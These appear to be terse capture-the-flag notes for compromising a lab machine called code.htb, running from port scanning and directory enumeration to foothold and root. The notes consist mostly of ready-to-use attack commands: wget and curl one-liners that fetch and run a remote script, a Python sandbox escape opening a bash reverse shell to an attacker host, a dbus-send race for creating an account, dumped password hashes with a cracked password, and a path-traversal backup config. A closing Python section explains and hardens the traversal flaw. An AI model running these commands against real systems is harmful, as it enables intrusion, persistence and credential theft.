Enumeration
🔍 Step 1: Nmap Scan
export IP=10.129.226.249
sudo nmap -sC -sV -oA code $IP -Pn
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
5000/tcp open http Gunicorn 20.0.4
|_http-server-header: gunicorn/20.0.4
|_http-title: Python Code Editor
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.92 seconds
📌 Step 2: Update /etc/hosts
echo "$IP code.htb" | sudo tee -a /etc/hosts
🕵️ Step 3: Directory Enumeration (feroxbuster)
feroxbuster -u http://code.htb \
-w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
-x php,html,js,txt,json,xml,bak,zip,tar,gz \
-o feroxbuster_code.txt
🛡️ Step 4: Web Vulnerability Scanning (Nikto)
nikto -host http://code.htb -output nikto_code.txt
🚨 Step 5: Your Reverse Shell Commands (use as needed):
Command #1 (wget):
wget http://10.10.14.93/bad.sh -O /tmp/bad.sh && sh /tmp/bad.sh
Command #2 (curl with IFS):
curl${IFS}10.10.14.93/bad.sh${IFS}|${IFS}bash
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:lucas string:"test vulns" int32:1 & sleep 0.013s; kill $!
$6$7sDOYFq7Y8cfjez9$J2y4RzOraF0UG/Qny4Dzu7KrT6YzSkVHYd.PXEUsOgyKps3M1C5ACqQcJZ1FAkbjX1bmAzRMuho8rrRTE04zM
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1000 org.freedesktop.Accounts.User.SetPassword string:'$6$7sDOYFq7Y8cfjez9$J2y4RzOraF0UG/Qny4Dzu7KrT6YzSkVHYd.PXEUsOgyKps3M1C5ACqQcJZ1FAkbjX1bmAzRMuho8rrRTE04zM' string:'test vulns' & sleep 0.004s; kill $!
().__class__.__base__.__subclasses__()[317](["/bin/bash","-c","ls|bash -i >& /dev/tcp/10.10.14.93/4444 0>&1"])
[(1, 'development', '759b74ce43947f5f4c91aeddc3e5bad3'), (2, 'martin', '3de6f30c4a09c27fc71932bfc68474be')]
nafeelswordsmaster
ssh martin@$IP
cat <<EOF > task.json
{
"destination": "/home/martin/backups/",
"multiprocessing": true,
"verbose_log": false,
"directories_to_archive": [
"/var/....//root/"
]
}
EOF
3de2761cc93a3826eff5fba500d8dfbc
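Why a value like `/var/....//root/` in `directories_to_archive` matters to whoever maintains the backup tool, shown as an added example (not code from the box or from these notes). It assumes the tool deletes `../` in a single pass and then checks for an allowed prefix; the function names and the `/var`, `/home` allow-list are assumptions.

```python
import os

# Assumed allow-list for the sketch; not taken from the page.
ALLOWED_ROOTS = ("/var", "/home")


def naive_sanitize(path: str) -> str:
    """Weak filter (assumed): delete every '../' in one left-to-right pass."""
    return path.replace("../", "")


def naive_is_allowed(path: str) -> bool:
    """Weak check: sanitize once, then trust a plain string prefix."""
    cleaned = naive_sanitize(path)
    return any(cleaned.startswith(root + "/") for root in ALLOWED_ROOTS)


def resolved_target(path: str) -> str:
    """Directory the archiver would really read after the weak filter ran."""
    return os.path.normpath(naive_sanitize(path))


def strict_resolve(path: str):
    """Hardened form: never rewrite the input. Refuse any '..' component,
    canonicalise (symlinks included), compare whole components against the
    allow-list, and return the canonical path for the caller to use."""
    if ".." in path.split("/"):
        return None
    real = os.path.realpath(path)
    for root in ALLOWED_ROOTS:
        real_root = os.path.realpath(root)
        if os.path.commonpath([real, real_root]) == real_root:
            return real
    return None


if __name__ == "__main__":
    sample = "/var/....//root/"  # value from the task.json above
    print(naive_sanitize(sample), naive_is_allowed(sample), resolved_target(sample))
    # Left alone, '....' is only an odd directory name under /var.
    print(strict_resolve(sample), strict_resolve("/var/../root/"))
```

The weak filter turns the input into `/var/../root/`, which still passes the prefix test but resolves to `/root`; the hardened form validates and returns one canonical path, so the string that is checked is the string that is used.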